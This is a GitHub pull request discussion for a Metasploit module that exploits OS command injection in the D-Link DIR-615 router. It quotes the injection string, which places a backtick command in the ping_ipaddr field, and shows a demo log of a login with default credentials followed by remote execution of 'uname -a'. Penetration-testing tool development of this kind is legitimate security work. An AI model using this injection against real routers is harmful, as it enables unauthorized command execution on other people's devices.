Dlink dir615 os command exec #1640
Conversation
| #original request | ||
| #data_cmd = "page=tools_vct&hping=0&ping_ipaddr=`#{datastore['CMD']}; echo end`&ping6_ipaddr=" | ||
|
|
||
| res = send_request_cgi( |
There was a problem hiding this comment.
Looks like you're not sending credentials, neither cookies, neither tokens in the exploiting request, maybe it isn't authenticated after all? Just asking :)
There was a problem hiding this comment.
the dlink is a crazy device ;) It authenticates my machine for 5mins. Enough time to execute our commands
There was a problem hiding this comment.
lol crazy! ok, in that case I think if you send the pcap for verification I can do the last cleanup by myself in this case and proceed with merging :)
BTW, if any of the payloads on metasploit allow you to convert any of the auxiliary remote code exec modules you're sending into an exploit module, it would be great :) Feel free to ask my for feedback if necessary :)
Thanks for your submissions!
There was a problem hiding this comment.
I will check all the auxiliary modules in the next time ... possible that we could generate some working exploits.
|
@jvazquez-r7 pcap is coming tomorrow. Thx for your helping hand |
|
Hi @m-1-k-3, After ask to more experienced developers, would be better to close it at the moment and work to convert it into an exploit. As explained by @hmoore-r7 the libupnp exploit can be a good reference https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb See #1637 |
Hey guys,
one more module - exploits the dlink dir 615 router:
Exploiting Demo - 192.168.178.105 / 0 auxiliary(dlink_dir_615_exec) > run
[] 192.168.178.199:80 - Trying to login with admin / admin1
[+] 192.168.178.199:80 - Successful login admin/admin1
[] 192.168.178.199:80 - Sending remote command: uname -a
[+] 192.168.178.199:80 - Exploited successfully
[] 192.168.178.199:80 - Command: uname -a
[] 192.168.178.199:80 - Output:
[*] Linux DIR-615 2.6.21 #2 Fri Jan 18 16:42:24 CST 2013 mips unknown
[*] Auxiliary module execution completed
Exploiting Demo - 192.168.178.105 / 0 auxiliary(dlink_dir_615_exec) > set VERBOSE false
VERBOSE => false
Exploiting Demo - 192.168.178.105 / 0 auxiliary(dlink_dir_615_exec) > run
[] 192.168.178.199:80 - Trying to login with admin / admin1
[+] 192.168.178.199:80 - Successful login admin/admin1
[] 192.168.178.199:80 - Sending remote command: uname -a
[+] 192.168.178.199:80 - Exploited successfully
[*] Auxiliary module execution completed
More details: http://www.s3cur1ty.de/m1adv2013-008
looking forward for your feedback
Best,
Mike